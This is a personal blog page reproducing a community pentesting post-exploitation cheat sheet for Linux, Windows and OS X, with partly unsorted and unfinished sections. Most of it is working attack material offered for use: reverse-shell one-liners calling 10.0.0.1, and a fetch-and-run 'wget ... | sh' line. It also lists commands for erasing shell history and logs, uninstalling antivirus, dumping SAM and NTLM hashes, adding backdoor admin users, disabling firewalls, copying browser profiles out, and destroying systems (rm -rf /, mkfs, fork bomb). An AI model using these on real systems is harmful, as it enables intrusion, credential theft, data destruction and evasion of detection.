Sam Stelfox

Thoughts from a software engineer, systems hacker and Linux gubernāre.

Pentesting Procedure

Defense

Offense

Prep Work

Discovery

Post-Exploitation

Linux/Unix/BSD Command List

The lastest Linux/Unix/BSD, OSX, and Windows docs here: https://bitly.com/nuc0N0

Blind Files

Things to pull when all you can do is blindly read, LFI/Dir traversal (Don’t forget %00!)

File Contents/Reason
/etc/resolv.conf Contains the current name servers (DNS) for the system. This is a globally readable file that is less likely to trigger IDS alerts than /etc/passwd
/etc/motd Message of the Day
/etc/issue Usually contains current version of distro
/etc/passwd List of users as well
/etc/shadow List of users’ passwords’ hashes (requires root)
System
Command   Description and/or Reason
uname -a    Prints the kernel version, arch, sometimes distro, ...  
ps aux  List all running processes
top -n 1 -b 
id  
arch        
w     who is connected, uptime and load avg
who -a  uptime, runlevel, tty, proceses etc.    
gcc -v    
mysql --version     
perl -v   
ruby -v 
python --version          
df -k mounted fs, size, % use, dev and mount point
mount mounted fs    
last -a 
lastcomm      
lastlog       
lastlogin (BSD)     
getenforce  
dmesg   
lspci 
lsusb 
lshw  
free -m     
cat /proc/cpuinfo     
cat /proc/meminfo 
du -h --max-depth=1 /   
which nmap  locate a command (in this case, nmap)
locate bin/nmap 
which nc      
locate bin/nc     
whoami  
jps -l  
java -version
Networking
hostname -f
ip addr show
ifconfig -a
route -n
cat /etc/network/interfaces
iptables -L -n
iptables -t nat -L -n
ip6tables -L -n
iptables-save
netstat -anop
netstat -r
netstat -nltupw (root with raw sockets)
arp -a
lsof -nPi

to resume it → “cat /proc/net/*” (more discret)
what does the above mean?
Configs
ls -aRl /etc/ | awk '$1 ~ /w.$/' | grep -v lrwx 2>/dev/null
cat /etc/issue{,.net}
cat /etc/passwd
cat /etc/shadow (gotta try..)
cat /etc/shadow~ # (sometimes there when edited with gedit)
cat /etc/master.passwd
cat /etc/group
cat /etc/hosts
cat /etc/crontab
cat /etc/sysctl.conf
for user in $(cut -f1 -d: /etc/passwd); do echo $user; crontab -u $user -l; done # (Lists all crons)
cat /etc/resolv.conf
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /opt/lampp/etc/httpd.conf
cat /etc/samba/smb.conf
cat /etc/openldap/ldap.conf
cat /etc/ldap/ldap.conf
pdbedit -L -w
pdbedit -L -v
cat /etc/exports
cat /etc/auto.master
cat /etc/auto_master
cat /etc/fstab
cat /etc/exports
find /etc/sysconfig/ -type f -exec cat {} \;
cat /etc/sudoers
Determine Distro
lsb_release -d            # Generic cmd for all LSB distros
/etc/lsb-release          # Generic config for all LSB distros
/etc/issue            # Generic but often modified
cat /etc/*release
/etc/SUSE-release           # Novell SUSE     
/etc/redhat-release, /etc/redhat_version    # Red Hat
/etc/fedora-release           # Fedora
/etc/slackware-release, /etc/slackware-version  # Slackware
/etc/debian_release, /etc/debian_version,     # Debian
/etc/mandrake-release         # Mandrake
/etc/sun-release          # Sun JDS
/etc/release            # Solaris/Sparc
/etc/gentoo-release           # Gentoo
/etc/rc.conf            # arch linux
arch # on OpenBSD sample: OpenBSD.amd64
uname -a (often hints at it pretty well)
Installed Packages
rpm -qa --last | head
yum list | grep installed
dpkg -l   
dpkg -l | grep -i “linux-image”   
pkg_info # FreeBSD
equery list * # on Gentoo but ‘equery’ needs to be installed so use “cd /var/db/pkg/ && ls -d */*” instead
Package Sources
cat /etc/apt/sources.list
ls -l /etc/yum.repos.d/
cat /etc/yum.conf
Finding Important Files
find /var/log -type f -exec ls -la {} \;
ls -alhtr /mnt
ls -alhtr /media
ls -alhtr /tmp
ls -alhtr /home
cd /home/; tree
ls /home/*/.ssh/*
find /home -type f -iname '.*history'
ls -lart /etc/rc.d/
locate tar | grep [.]tar$
locate tgz | grep [.]tgz$
locate sql l grep [.]sql$
locate settings | grep [.]php$
locate config.inc | grep [.]php$
ls /home/*/id*
locate .properties | grep [.]properties # java config files
locate .xml | grep [.]xml # java/.net config files
find /sbin /usr/sbin /opt /lib `echo $PATH | ‘sed s/:/ /g’` -perm -4000 # find suids
locate rhosts
Covering Your Tracks
Avoiding history files
export HISTFILE=

This next one might not be a good idea, because a lot of folks know to check for tampering with this file, and will be suspicious if they find out: 
rm -rf ~/.bash_history && ln -s ~/.bash_history /dev/null (invasive)  
touch ~/.bash_history (invasive)
<space> history -c (using a space before a command) 
zsh% unset HISTFILE HISTSIZE  
t?csh% set history=0  
bash$ set +o history
ksh$ unset HISTFILE

Note that you’re probably better off modifying or temporary disabling rather than deleting history files, it leaves a lot less traces and is less suspect.
Obtain users’ information
ls -alh /home/*/  
ls -alh /home/*/.ssh/
cat /home/*/.ssh/authorized_keys
cat /home/*/.ssh/known_hosts
cat /home/*/.*hist* # you can learn a lot from this
find -type f /home/*/.vnc /home/*/.subversion
grep ^ssh /home/*/.*hist*
grep ^telnet `/home/*/.*hist*
grep ^mysql /home/*/.*hist*
cat /home/*/.viminfo
sudo -l # if sudoers is not readable, this sometimes works per user
crontab -l
cat /home/*/.mysql_history
Escalating
Looking for possible opened paths

ls -alh /root/
cat /etc/sudoers
cat /etc/shadow
cat /etc/master.passwd # OpenBSD
cat /var/spool/cron/crontabs/* | cat /var/spool/cron/*
lsof -nPi
ls /home/*/.ssh/*
Maintaining Control
Reverse Shell
Starting list sourced from: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 (No /dev/tcp on Debian, but use nc, TCL, awk or any interpreter like Python, and so on.).
perl -e 'use Socket; $i="10.0.0.1"; $p=1234; socket(S,PF_INET, SOCK_STREAM, getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){ open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i");};'
python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect(("10.0.0.1",1234)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i; exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' nc -e /bin/sh 10.0.0.1 1234 # note need -l on some versions, and many does NOT support -e anymore
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
xterm -display 10.0.0.1:1 
Listener- Xnest :1
Add permission to connect- xhost +victimIP
ssh -NR 3333:localhost:22 [email protected]
nc -e /bin/sh 10.0.0.1 1234
Fun if Windows is present and accessible
If there is Windows installed and the logged-in user access level includes those Windows partition, attacker can mount them up and do a much deeper information gathering, credential theft and root-ing. Ntfs-3g is useful for mounting ntfs partitions read-write.
TODO: insert details on what to look for
Stuff to be sorted

## GOING TO MOVE EVERYTHING HERE FOR LEGIBILITY ONCE EDITING DIES DOWN
Command   Output
uname -a    Linux kernel version, usually distribution too
ps aux      List of running processes
id  List current user and group along with user/group id    
w Show info about who is logged, what are they are doing    
who -a  Print information about users   
cat /dev/core > /dev/audio

cat /dev/mem > /dev/audio Makes a sound from the memory content.
Usefullness of this???
Deleting and Destroying
(If it is necessary to leave the machine inaccessible or unusable)
Note that this tends to be quite evident (as opposed to a simple exploitation that might go unnoticed for some time, even forever), and will most surely get you into troubles.

Oh, and you’re probably a jerk if you use any of the stuff below.
Command Description
rm -rf /  This will recursively try to delete all files.
char esp[] __attribute__ ((section(”.text”))) /* e.s.p release */ = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;”;   Hex version of rm -rf / 
How is this supposed to work?
mkfs.ext3 /dev/sda  Reformat the device mentioned, making recovery of files hard.   
chmod -R 000 /  Files are not lost but only accessible from another system, or a live distro. Nobody will be able to login, nor shut the computer down, and if forcibly shut down it won’t start again.
Execute a remote script

This command forces the download of a file and immediately its execution, can be exploited easily using or reverse shell exploit

wget http://server/file.sh -O- | sh
Fork Bomb

The [in]famous "fork bomb". This command will cause your system to run a large number of processes, until it "hangs". This can often lead to data loss (e.g. if the user brutally reboots, or the OOM killer kills a process with unsaved work). If left alone for enough time a system can eventually recover from a fork bomb.

:(){:|:&};: 

Windows Post-Exploitation Command List

Blind Files

(Things to pull when all you can do is to blindly read) LFI/Directory traversal(s).
Files that will have the same name across networks / Windows domains / systems.
File  Expected Contents / Description
%SYSTEMDRIVE%\boot.ini  A file that can be counted on to be on virtually every windows host. Helps with confirmation that a read is happening.
%WINDIR%\win.ini  This is another file to look for if boot.ini isn’t there or coming back, which is some times the case.
%SYSTEMROOT%\repair\SAM It stores users' passwords in a hashed format (in LM hash and NTLM hash).
%SYSTEMROOT%\repair\system  
>insert new rows above this line< SEE IMPORTANT FILES SECTION FOR MORE IDEAS

Non Interactive Command Execution

System

Command Expected Output or Description
whoami  Lists your current user. Not present in all versions of Windows; however shall be present in Windows NT 6.0-6.1.
whoami /all Lists current user, sid, groups current user is a member of and their sids as well as current privilege level.
set Shows all current environmental variables. Specific ones to look for are USERDOMAIN, USERNAME, USERPROFILE, HOMEPATH, LOGONSERVER, COMPUTERNAME, APPDATA, and ALLUSERPROFILE.
systeminfo (XP+)  Outputs a large amount of data about the sytem, including hostname, domain, logon server, time zone, network interface config, and hotfixes installed
qwinsta (XP, 2000, + ?) Displaying information about RDP sessions. /CONNECT can be added, but usually not. needed to gain the information you need.
qprocess *  Much like tasklist, but a bit easier to read. It has username, login method, session id, pid, and binary name. 
at  Shows currently scheduled tasks via ‘at’. Even though schtasks is the new way of doing things admin wise, pentesters can still use ‘at’ to get system level shells even through Win7x64 systems.
schtasks (XP+)  Lists all the currently scheduled tasks that your current user has access to see. This is the big deviation from ‘at’. Each user can have their own scheduled tasks now.
schtasks /query /fo csv /v > %TEMP% Outputs the list of services in verbose csv format. Good for throwing in temp and pulling down for a more closer look.
net start

OR

sc  Lists services
-> sc getkeyname “XXXXX”  You can use the name you got from ‘net start’ to get the ‘key name’ of the service you want more information on.
--> sc queryex “XXXXX”  Using the keyname you achieved from ‘getkeyname’, you can query the status, pid and other information about the service.
net config workstation  This will display information such as NetBIOS name, the full computer name, Username (of the user executing this command), Domain, Workgroups, and more.
net time  
net file  
net session 
net use Used to map network shares, such as the C:\ drive.
tasklist (XP+)  Is equivalent to using Taskmanager, though visible as console output instead with PID’s too.
tasklist /m  or tasklist /m blah.dll  Lists all of the ‘modules’ (binary (exe, dll, com or any other PE based code that was executed) for each psportsportrocess, or if a module is specified then tasklist will only list the processes with that specific module running. Great for finding processes running crypto or other specific function dlls
tasklist /svc Lists processes and their accompanying service 
keyname if they are parented by a service
taskkill [/f] /pid <pid>
taskkill [/f] /im <image_name>  Kill processes by name or pid (with force option)
fsutil fsinfo drives  Must be an administrator to run this, but it list the current drives on the system.

Networking (ipconfig, netstat, net)

Command Expected Output or Description
ipconfig /all Displays the full information about your NIC’s.
ipconfig /displaydns  Displays your local DNS cache.
netstat -bano 
netstat -s -p [tcp|udp|icpm|ip] 
netstat -r  
netstat -na | findstr :445  
netstat -nao | findstr LISTENING  XP and up for -o flag to get PID
netstat -nao | findstr LISTENING  XP and up for -o flag to get PID
netstat -na | findstr LISTENING 
netsh diag show all 
net view  Queries NBNS/SMB (SAMBA) and tries to find all hosts in your current workgroup.
net view /domain  
net view /domain:otherdomain  
net user %USERNAME% /domain Pulls information on the current user, if they are a domain user. If you are a local user then you just drop the /domain. Important things to note are login times, last time changed password, logon scripts, and group membership
net user /domain  Lists all of the domain users
net accounts  Prints the password policy for the local system. This can be different and superseded by the domain policy.
net accounts /domain  Prints the password policy for the domain
net localgroup administrators Prints the members of the Administrators local group
net localgroup administrators /domain as this was supposed to use localgroup & domain, this actually another way of getting *current* domain admins
net group “Domain Admins” /domain Prints the members of the Domain Admins group
net group “Enterprise Admins” /domain Prints the members of the Enterprise Admins group
net group “Domain Controllers” /domain  Prints the list of Domain Controllers for the current domain
nbtstat -a [ip here]  
net share Displays your currently shared SMB entries, and what path(s) they point to.
net session | find / “\\” 
arp -a  Lists all the systems currently in the machine’s ARP table. 
route print Prints the machine’s routing table. This can be good for finding other networks and static routes that have been put in place
browstat (Not working on XP)  

http://www.securityaegis.com/ntsd-backdoor/

Configs

Command Expected Output or Description
gpresult /z Extremely verbose output of GPO (Group policy) settings as applied to the current system and user
sc qc 
sc query  
sc queryex  
type %WINDIR%\System32\drivers\etc\hosts  Print the contents of the Windows hosts file
dir %PROGRAMFILES%  Prints a diretory listing of the Program Files directory.
echo %COMSPEC%  Usually going to be cmd.exe in the Windows directory, but it’s good to know for sure.

Finding Important Files

Command Description / Reason
tree C:\ /f /a > C:\output_of_tree.txt  Prints a directory listing in ‘tree’ format. The /a makes the tree printed with ASCII characters instead of special ones and the /f displays file names as well as folders
dir /a  
dir /b /s [Directory or Filename] 
dir \ /s /b | find /I “searchstring”  Searches the output of dir from the root of the drive current drive (\) and all sub drectories (/s) using the ‘base’ format (/b) so that it outputs the full path for each listing, for ‘searchstring’ anywhere in the file name or path.
command | find /c /v “” Counts the lines of whatever you use for ‘command’

Files To Pull (if possible)

File location Description / Reason
%SYSTEMDRIVE%\pagefile.sys
Large file, but contains spill over from RAM, usually lots of good information can be pulled, but should be a last resort due to size
%WINDIR%\debug\NetSetup.log 
%WINDIR%\repair\sam 
%WINDIR%\repair\system  
%WINDIR%\repair\software  
%WINDIR%\repair\security  
%WINDIR%\iis6.log (5, 6 or 7) 
%WINDIR%\system32\logfiles\httperr\httperr1.log 
%WINDIR%\system32\logfiles\w3svc1\exYYMMDD.log (year month day) 
%WINDIR%\system32\config\AppEvent.Evt 
%WINDIR%\system32\config\SecEvent.Evt 
%WINDIR%\system32\config\default.sav  
%WINDIR%\system32\config\security.sav 
%WINDIR%\system32\config\software.sav 
%WINDIR%\system32\config\system.sav 
%WINDIR%\system32\CCM\logs\*.log  
%USERPROFILE%\ntuser.dat  
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat 
%WINDIR%\System32\drivers\etc\hosts 

Remote System Access

Command Description / Reason
net share \\computername  
tasklist /V /S computername 
qwinsta /SERVER:computername  
qprocess /SERVER:computername * 
net use \\computername  This maps IPC$ which does not show up as a drive but allows you to access the remote system as the current user. This is less helpful as most commands will automatically make this connection if needed
net use \\computername /user:DOMAIN\username password Using the IPC$ mount use a user name and password allows you to access commands that do not usually ask for a username and password as a different user in the context of the remote system.

This is useful when you’ve gotten credentials from somewhere and wish to use them but do not have an active token on a machine you have a session on.

net time \\computername (Shows the time of target computer)
dir \\computername\share_or_admin_share\   (dir list a remote directory)
tasklist /V /S computername
Lists tasks w/users running those tasks on a remote system. This will remove any IPC$ connection after it is done so if you are using another user, you need to re-initiate the IPC$ mount

Auto-Start Directories

ver (Returns kernel version - like uname on *nix)

Windows NT 6.1, 6.0 %SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\
Windows NT 5.2, 5.1, 5,0  %SystemDrive%\Documents And Settings\All Users\Start Menu\Programs\StartUp\
Windows 9x  %SystemDrive%\WINDOWS\Start Menu\Programs\StartUp\
Windows NT 4.0, 3.51, 3.50  %SystemDrive%\WINNT\Profiles\All Users\Start Menu\Programs\StartUp\

WMI

wmic bios
wmic qfe
wmic qfe get hotfixid  (This gets patches IDs)
wmic startup
wmic service
wmic os
wmic process get caption,executablepath,commandline
wmic process call create “process_name” (executes a program)
wmic process where name=”process_name” call terminate (terminates program)
wmic logicaldisk where drivetype=3 get name, freespace, systemname, filesystem, size, volumeserialnumber (hard drive information)
wmic useraccount (usernames, sid, and various security related goodies)
wmic useraccount get /ALL
wmic share get /ALL (you can use ? for gets help ! )
wmic startup list full (this can be a huge list!!!)
wmic /node:"hostname" bios get serialnumber (this can be great for finding warranty info about target)

Reg Command 

reg save HKLM\Security security.hive  (Save security hive to a file)
reg save HKLM\System system.hive (Save system hive to a file)
reg save HKLM\SAM sam.hive (Save sam to a file)=
reg add [\\TargetIPaddr\] [RegDomain][ \Key ] 
reg export [RegDomain]\[Key] [FileName] 
reg import [FileName ]
reg query [\\TargetIPaddr\] [RegDomain]\[ Key ] /v [Valuename!] (you can to add /s for recurse all values )

Deleting Logs

wevtutil el  (list logs)
wevtutil cl <LogName> (Clear specific log)
del %WINDIR%\*.log /a /s /q /f

Uninstalling Software “AntiVirus” (Non interactive)

wmic product get name /value (this gets software names)
wmic product where name="XXX" call uninstall /Interactive:Off (this uninstalls software)

# Other  (to be sorted)

pkgmgr usefull  /iu :”Package”
pkgmgr usefull  /iu :”TelnetServer” (Install Telnet Service ...)
pkgmgr /iu:”TelnetClient” (Client )
rundll32.exe user32.dll, LockWorkStation (locks the screen -invasive-)
wscript.exe <script js/vbs>
cscript.exe <script js/vbs/c#>
xcopy /C /S %appdata%\Mozilla\Firefox\Profiles\*.sqlite \\your_box\firefox_funstuff

OS SPECIFIC

Win2k3

winpop stat domainname

Vista/7

winstat features
wbadmin get status
wbadmin get items
gpresult /H gpols.htm
bcdedit /export <filename>

Vista SP1/7/2008/2008R2 (x86 & x64)

Enable/Disable Windows features with Deployment Image Servicing and Management (DISM):
*Note* Works well after bypassuac + getsystem (requires system privileges)
*Note2* For Dism.exe to work on x64 systems, the long commands are necessary

To list features which can be enabled/disabled:
%windir%\System32\cmd.exe /c "%SystemRoot%\system32\Dism.exe" /online /get-features

To enable a feature (TFTP client for example):
%windir%\System32\cmd.exe /c "%SystemRoot%\system32\Dism.exe" /online /enable-feature /featurename:TFTP

To disable a feature (again TFTP client):
%windir%\System32\cmd.exe /c "%SystemRoot%\system32\Dism.exe" /online /disable-feature /featurename:TFTP

Invasive or Altering Commands

These commands change things on the target and can lead to getting detected
Command Description
net user hacker hacker /add Creats a new local (to the victim) user called ‘hacker’ with the password of ‘hacker’
net localgroup administrators /add hacker
or
net localgroup administrators hacker /add Adds the new user ‘hacker’ to the local administrators group
net share nothing$=C:\ /grant:hacker,FULL /unlimited  Shares the C drive (you can specify any drive) out as a Windows share and grants the user ‘hacker’ full rights to access, or modify anything on that drive.

One thing to note is that in newer (will have to look up exactly when, I believe since XP SP2) windows versions, share permissions and file permissions are separated. Since we added our selves as a local admin this isn’t a problem but it is something to keep in mind
net user username /active:yes /domain Changes an inactive / disabled account to active. This can useful for re-enabling old domain admins to use, but still puts up a red flag if those accounts are being watched.
netsh firewall set opmode disable Disables the local windows firewall
netsh firewall set opmode enable  Enables the local windows firewall. If rules are not in place for your connection, this could cause you to loose it.

Support Tools Binaries / Links / Usage

Command Link to download  Description

Third Party Portable Tools

 (must be contained in a single executable)

REMEMBER: DO NOT RUN BINARIES YOU HAVEN’T VETTED - BINARIES BELOW ARE NOT BEING VOUCHED FOR IN ANY WAY AS THIS DOCUMENT CAN BE EDITED BY ANYONE
Command Link to download  Description
carrot.exe /im /ie /ff /gc /wlan /vnc /ps /np /mp /dialup /pwdump http://h.ackack.net/carrot-exe.html -invasive- Recovers a bunch passwords.
PwDump7.exe > ntlm.txt  http://www.tarasco.org/security/pwdump_7/ -invasive- Dumps Windows NTLM hashes. Holds the credentials for all accounts.
http://www.nirsoft.net/utils/nircmd.html  A collection of small nifty features.
wce.exe http://www.ampliasecurity.com/research/wce_v1_2.tgz Pull NTLM hashes from login sessions out of memory, steal ks tickets from activerberoe processes and apply them to others.

(Page break just so we can have the straight up cmds on their own)

Meterpreter Commands
ps  (show running processes and their associated users/id numbers)
getuid  
getpid  
getprivs  (shows current privileges)
getsystem Attempts to get SYSTEM using 4 methods, the last being a local exploit called Kitrap0d. This can sometimes be caught by host based IDS systems and even in rare occasions blue screen the machine.
getsystem - (place holder for targetd getsys) If anyone wants to fill this in before I can please do
sysinfo 
timestomp Remove/screw up timestamps if you are good enough this messes up audit tools
clearev Clear A
hashdump  dump SAM file hashes for pass the hash or cracking
migrate [pid] Move from exploited process into another process

Useful Meterpreter Scripts
killav.rb (Meterpreter script that kills all Antivirus processes.)
winenum.rb (Retrieves all kinds of information about the system including environment variables,  interfanetworkces, print_line "routing, user accounts, and much more.)
scraper.rb (harvest system info including network shares, registry hives and password hashes.)
persistence.rb (Meterpreter Script for creating a persistent backdoor on a target host.)
keylogrecorder.rb (This script will start the Meterpreter Keylogger and save all keys.)
getgui.rb (Windows Remote Desktop Enabler Meterpreter Script.)
For a complete list please see: http://metasploit.com/svn/framework3/trunk/scripts/meterpreter/

Useful Meterpreter Post Modules

post/windows/gather/smart_hashdump
post/windows/gather/credentials/vnc
post/windows/escalate/bypassuac (mixed results)

Useful Multi-Step Techniques

“Pass The Hash” attack (Gain access to other computers with stolen hashes, no cracking involved)
Token impersonation via incognito

OSX Post-Exploitation Command List

Blind Files 

(things to pull when all you can do is blindly read) LFI/dir traversal
/etc/resolv.conf (everyone always has read on this and it wont trigger an IDS)

SYSTEM

uname -a
sw_vers -productName
sw_vers -productVersion
system_profiler
id
printenv
who
ps aux
ps ea
dscl localhost -read /Search/Users/bob (read password hash of bob)
dscl localhost -read /Search/Users/bob ShadowHashData | tail -1 | xxd -r -p | plutil -convert xml1 -o - - (Dump in workable format)
dscl localhost -passwd /Search/Users/bob (change bob’s password without needing current)
/Library/Application Support/VMware Fusion/vmrun list
/Library/Application Support/VMware Fusion/vmrun CopyFileFromHostToGuest windowsmalicious.exe aWindowsVM
/Library/Application Support/VMware Fusion/vmrun captureScreen WindowsVM
Snow Leopard and Lion
dscacheutil -q user
dscacheutil -q group
Tiger
lookupd -q user
lookupd -q group

Networking

ifconfig
netstat -np tcp
netstat -np udp

Configs

ls -alh /private/etc/
ls -alh /Library/Application Support/VMware Fusion/

Packages

port installed
ls -alh /Applications/

Finding Important Files

ls -ma ~/
ls -alh /Users/
ls -alh /Users/*/.ssh/
ls -alh /Users/*/.gnupg/
ls -alh /Volumes/

Files to pull

Remote System Access

Priv

cat /Library/Application Support/Objective Development/Little Snitch/rules.xpl
ipfw list

The current Linux list: 
(lets remove anything that doesn’t work (or doesn’t mean anything) on OS X)

# System
uname -a
ps aux
ps -aef
id
arch
w
who -a
gcc -v
mysql --version
perl -v
ruby -v
python --version
df -k
mount
last -a

lastlogin (*bsd)
getenforce
dmesg
lspci
lsusb
lshw
free -m
du -h --max-depth=1 /
which nmap (see if it’s already installed)
locate bin/nmap
which nc (see if it’s already installed)
locate bin/<whatever you want>
whoami
jps -l
java -version

# Networking
hostname -f
ip addr show
ifconfig -a
route -n
cat /etc/network/interfaces
iptables -L -n
netstat -anop
netstat -r
netstat -nltupw (root with raw sockets)
arp -a
lsof -nPi

# Configs
ls -aRl /etc/ | awk '$1 ~ /w.$/' | grep -v lrwx 2>/dev/null
cat /etc/issue{,.net}
cat /etc/passwd
cat /etc/shadow (gotta try..)
cat /etc/shadow~ # (sometimes there when edited with gedit)
cat /etc/master.passwd
cat /etc/group
cat /etc/hosts
cat /etc/crontab
cat /etc/sysctl.conf
for user in $(cut -f1 -d: /etc/passwd); do echo $user; crontab -u $user -l; done # (Lists all crons)
cat /etc/resolv.conf
cat /etc/samba/smb.conf
pdbedit -L -w
pdbedit -L -v
cat /etc/exports
cat /etc/auto.master
cat /etc/auto_maste
cat /etc/fstab
cat /etc/exports
find /etc/sysconfig/ -type f -exec cat {} \;
cat /etc/sudoers

#Package Sources
cat /etc/apt/sources.list
ls -l /etc/yum.repos.d/
cat  /etc/yum.conf

# Finding Important Files
find /var/log -type f -exec ls -la {} \;
ls -alhtr /mnt
ls -alhtr /Volumes
ls -alhtr /tmp
ls -alhtr /home
ls /Users/*/.ssh/*
find /home -type f -iname '.*history'
ls -lart /etc/rc.d/
locate tar | grep [.]tar$
locate tgz | grep [.]tgz$
locate sql l grep [.]sql$
locate settings | grep [.]php$
locate config.inc | grep [.]php$
ls /Users/*/id*
locate .properties | grep [.]properties # java config files
locate .xml | grep [.]xml # java/.net config files
find /sbin /usr/sbin /opt /lib `echo $PATH | ‘sed s/:/ /g’` -perm -4000 # find suids

# Per User
ls -alh /Users/*/
ls -alh /Users/*/.ssh/
cat /Users/*/.ssh/authorized_keys
cat /Users/*/.ssh/known_hosts
cat /Users/*/.*hist*
find -type f /Users/*/.vnc /Users/*/.subversion
grep ^ssh /Users/*/.*hist*
grep ^telnet `/Users/*/.*hist*
grep ^mysql /Users/*/.*hist*
cat /Users/*/.viminfo
sudo -l # if sudoers is not readable, this sometimes works per user
crontab -l

# Priv (sudo’d or as root)
ls -alh /root/
cat /etc/sudoers
cat /etc/shadow
cat /etc/master.passwd # OpenBSD
cat /var/spool/cron/crontabs/*
lsof -nPi
ls /Users/*/.ssh/*

# Reverse Shell
starting list sourced from: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 # No /dev/tcp on Mac OS X
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
nc -e /bin/sh 10.0.0.1 1234 # note need -l on some versions, and many does NOT support -e anymore
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
xterm -display 10.0.0.1:1
Listener-     Xnest :1
Add permission to connect-  xhost +victimIP

Persistance

Branching out once inside

Good

Better

  * What if cmd.exe is disabled?
    * Drop a binary (last resort)
    * Use the underlying API
    * Railgun
  * User Discovery
    * Good
      * net group "domain admins" /domain
      * net group "domain admins" /domain:DM
      * net localgroup Administrators
      * net group localgroup Administrators /domain
      * net user domainadmin_username /domain
      * net user username /domain
    * Better
      * rpcclient - enumerate users
      * ```#!/bin/bash
for i in {500..600}; do
    rpcclient -U "user%Password1" -W DOMAIN 1.2.3.4 -c "lookupsids s-1-5-21-1289870825-1602939633-2792175544-$i"
done```
      * People's passwords suck
    * https://www.corelan.be/index.php/my-free-tools/ad-cs/pve-find-ad-user/
  * Zombies
    * runas
      * ShellExecute, CreateProcessWithLogon, LogonUser
    * WCE + runhash32/64
      * user level psexec == zombie user & token
    * Run executable in memory
  * Privilege Escalation
    * Good
      * getsystem
      * Post modules
        * Keyboard layout
        * Bypassuac
      * Core Impact / Canvas ship with locals
        * Honestly a big lacking area for MSF
    * Better?
      * DomainDrop?
        * client.railgun.netapi32.NetUnjoinDomain(nil,nil,nil,nil)
    * Best
      * Just ask for it...
        * Tasklist
          * tasklist /V /S $IP /U $user /P $password
          * for /F "skip=3 delims=\" %A in ('net view') do tasklist /V /S %A /U $user /P $password
  * Finding the data that actually matters...
    * Good "Searching for Gold"
      * dir /s "My Documents"
      * dir /s "Desktop"
      * dir /s *.pcf
      * ListDrives
      * Searching for files
        * dir c:\*password* /s
        * dir c:\*competitor* /s
        * dir c:\*finance* /s
        * dir c:\*risk* /s
        * dir c:\*assessment* /s
        * dir c:\*.key* /s
        * dir c:\*.vsd /s
        * dir c:\*.pcf /s
        * dir c:\*.ica /s
        * dir c:\*.crt /s
        * dir c:\*.log /s
      * Searching in files
        * findstr /I /N /S /P /C:password *
        * findstr /I /N /S /P /C:secret *
        * findstr /I /N /S /P /C:confidential *
        * findstr /I /N /S /P /C:account *
      * Powershell/WMIC to do it
    * Better
      * Dumplinks
      * GetFirefoxCreds
      * GetPidginCreds
      * Outlook, IE, Chrome, RDP, Password Extraction
        * Basically the whole 'credentials' post module section
      * SharePoint
      * intranet.company.com
    * Best
      * OpenDLP
      * Fiction's Database Searcher
      * Search in Meterpreter
        * Uses windows indexing i.e. outlook email
      * dir /s $share > filetosearchoffline.txt
        * findstr too
        * throw into a click script?
  * Pivoting
    * portforwarding
      * meterpreter portfwd
      * route
      * sock4a module + meterpreter session
      * pro VPN pivot?
    * portproxy
      * built into windows
        * netsh interface portproxy>add v4tov4 listenport=25 connectaddress=192.168.0.100 connectport=80 protocol=tcp
    * Legitimate Access via VPN, Term Server, Citrix, etc
  * Persistence
    * "One week isn't showing impact of internal awarenes..."
    * Autoruns
    * smartlocker -> lockout_recorder
      * http://blog.metasploit.com/2010/12/capturing-windows-logons-with.html
    * Fxsst.dll
      * https://blog.mandiant.com/archives/1786
      * http://www.room362.com/blog/2011/6/27/fxsstdll-persistence-the-evil-fax-machine.html
    * gpo_dropper hbgary
      * http://www.hbgary.com/malware-using-local-group-policy
    * IPv6 Dropper
      * http://hak5.org/hack/ipv6-from-the-pentesters-perspective
  * https://github.com/mubix/Not-In-Pentesting-Class